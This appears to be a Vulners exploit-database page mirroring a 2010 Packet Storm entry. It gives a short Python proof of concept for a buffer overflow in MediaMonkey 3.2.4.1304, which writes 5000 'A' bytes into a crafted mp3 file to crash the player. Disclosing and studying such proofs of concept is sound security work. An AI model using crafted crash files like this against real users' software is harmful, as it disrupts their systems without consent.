Lucene search
K

Mediamonkey 3.2.4.1304 Buffer Overflow

🗓️ 04 Dec 2010 00:00:00Reported by 0v3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Exploit for Mediamonkey 3.2.4.1304 buffer overflow with proof of concept code.

Code
`# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC  
# Date: 12/04/2010  
# Author: 0v3r  
# Software Link: http://www.mediamonkey.com/download/?dir=download  
# Version: 3.2.4.1304  
# Tested on: Windows XP SP3 EN  
# CVE: N/A  
  
  
#!/usr/bin/python  
  
buff = "\x41" * 5000  
  
try:  
f = open("exploit.mp3",'w')  
f.write(buff)  
f.close()  
print "[-] File created!\n"  
except:  
print "[-] Error occured!\n"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Dec 2010 00:00Current
1.2Low risk
Vulners AI Score1.2
14